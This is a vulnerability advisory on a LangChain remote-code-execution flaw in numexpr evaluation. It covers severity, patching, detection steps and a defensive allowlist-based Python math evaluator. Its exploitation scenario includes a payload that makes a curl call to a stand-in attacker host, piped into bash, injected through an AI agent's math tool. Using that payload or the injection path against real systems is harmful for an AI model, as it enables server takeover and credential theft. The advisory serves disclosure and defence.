CVE-2023-39631: LangChain: RCE via numexpr evaluate injection

GHSA-f73w-4m7g-ch9x | CRITICAL | PoC AVAILABLE | CISA: ATTEND
Published September 1, 2023
CISO Take

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

What is the risk?

Critical. CVSS 9.8 with network-accessible attack vector, low complexity, and zero privilege requirements makes this trivially exploitable by any unauthenticated attacker. LangChain is among the most widely deployed AI frameworks in production, meaning blast radius is exceptionally high. The EPSS of 3.3% understates real-world risk given public PoC availability at time of disclosure. Organizations running LangChain-powered chatbots, agents, or APIs with math tools exposed are effectively offering unauthenticated shell access.

What systems are affected?

Package     Ecosystem   Vulnerable Range   Patched
LangChain   pip         -                  No patch
LangChain   pip         < 0.0.308          0.0.308
numexpr     pip         < 2.8.5            2.8.5

LangChain package profile: 139.8K · OpenSSF 5.9 · 2.7K dependents · 24% patched · ~156d to patch

How severe is it?

CVSS 3.1: 9.8 / 10
EPSS: 1.3% chance of exploitation in 30 days (higher than 67% of all CVEs)
Exploitation Status: Exploit Available (Exploitation: MEDIUM)
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): High

What should I do?

5 steps

  1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments, including containerized and serverless deployments with pinned dependencies.

  2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments.

  3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions.

  4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs.

  5. VERIFY: Post-patch, confirm the resolved versions with `pip show langchain numexpr` and validate that dependency resolution does not transitively reinstall vulnerable versions.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.2 - AI-related processes for suppliers and partners
NIST AI RMF
MANAGE 2.2 - Manage AI risks from dependencies and supply chain
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-39631?

Any LangChain deployment below v0.0.308 using math-capable tools is exposed to unauthenticated remote code execution — no credentials, no user interaction required. Patch immediately: upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5. If patching is not immediate, disable all LangChain tools that invoke numexpr evaluation (e.g., LLMMathChain) and block internet exposure of affected endpoints.

Is CVE-2023-39631 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-39631, increasing the risk of exploitation.

How to fix CVE-2023-39631?

1. PATCH: Upgrade langchain to ≥0.0.308 and numexpr to ≥2.8.5 across all environments, including containerized and serverless deployments with pinned dependencies.
2. INVENTORY: Enumerate all instances of LangChain ≤0.0.307, prioritizing internet-facing deployments.
3. WORKAROUND (if patching delayed): Remove or disable LLMMathChain and any custom tool invoking numexpr.evaluate() on user input; enforce input validation rejecting non-numeric expressions.
4. DETECT: Monitor for anomalous process spawning from LangChain processes, outbound connections from application servers, and unusual patterns in tool invocation logs.
5. VERIFY: Post-patch, confirm the resolved versions with `pip show langchain numexpr` and validate that dependency resolution does not transitively reinstall vulnerable versions.

What systems are affected by CVE-2023-39631?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM application pipelines, math and calculation tool chains, RAG pipelines with calculation tools, model serving with LangChain middleware.

What is the CVSS score for CVE-2023-39631?

CVE-2023-39631 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.32%.

What is the AI security impact?

Affected AI Architectures

agent frameworks
LLM application pipelines
math and calculation tool chains
RAG pipelines with calculation tools
model serving with LangChain middleware

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.9.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM05

What are the technical details?

Original Advisory

An issue in LangChain-ai Langchain v.0.0.245 allows a remote attacker to execute arbitrary code via the evaluate function in the numexpr library.

Exploitation Scenario

An adversary targets a publicly accessible LangChain-powered API or chatbot that offers calculation capabilities via LLMMathChain. The attacker submits a crafted mathematical expression as input — e.g., `__import__('os').system('curl attacker.com/shell.sh|bash')` — which LangChain forwards unsanitized to numexpr.evaluate(). numexpr interprets this as a valid Python expression and executes it with the application server's privileges. The attacker establishes a reverse shell (AML.T0072), exfiltrates stored API keys, model configs, and RAG database credentials, then pivots laterally to internal model registries or vector databases. No authentication is required at any stage.
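Added example, not LangChain or numexpr code: an allowlist gate that implements the step 3 workaround ("input validation rejecting non-numeric expressions") for the unchecked `numexpr.evaluate()` path described in the scenario above. The user string is parsed with Python's `ast` module, only numeric literals, arithmetic operators and four named functions are accepted, and the result is computed by a small evaluator of its own, so no general-purpose evaluator ever touches the raw input; the function names, the allowed function set and the limits are my own choices.

```python
import ast
import math
import operator

# Operators and named functions the calculator tool is allowed to compute.
_BIN_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.Pow: operator.pow, ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}
_FUNCS = {"sqrt": math.sqrt, "abs": abs, "log": math.log, "exp": math.exp}


def _eval_node(node: ast.AST) -> float:
    """Evaluate one AST node, raising ValueError for anything not allowlisted."""
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value  # str/bool/complex literals (e.g. 'os') fall through to the error
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > 1000:
            raise ValueError("exponent too large")  # a "valid" 9**9**9 must not exhaust CPU/RAM
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Calls may only name an allowlisted function directly: no attributes, no keywords.
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
            and node.func.id in _FUNCS and not node.keywords):
        return _FUNCS[node.func.id](*(_eval_node(a) for a in node.args))
    # Name, Attribute, Subscript, Lambda etc. land here, so `__import__('os')` is rejected.
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def safe_math_eval(expr: str, max_len: int = 200) -> float:
    """Parse and evaluate user arithmetic; ValueError for rejected syntax, ArithmeticError for math."""
    if len(expr) > max_len:
        raise ValueError("expression too long")  # cheap bound before the parser sees it
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not a valid expression: {exc.msg}") from exc
    return _eval_node(tree.body)


def is_safe_math_expression(expr: str) -> bool:
    """Gate for a tool wrapper or log scanner: True only for pure arithmetic that evaluates."""
    try:
        safe_math_eval(expr)
    except (ValueError, ArithmeticError, RecursionError):
        return False
    return True
```

A tool wrapper calls `safe_math_eval` where it would otherwise call `numexpr.evaluate`; `is_safe_math_expression` can also be run over recorded tool inputs to flag past invocations that were not arithmetic (step 4).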

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
September 1, 2023
Last Modified
February 20, 2025
First Seen
September 1, 2023
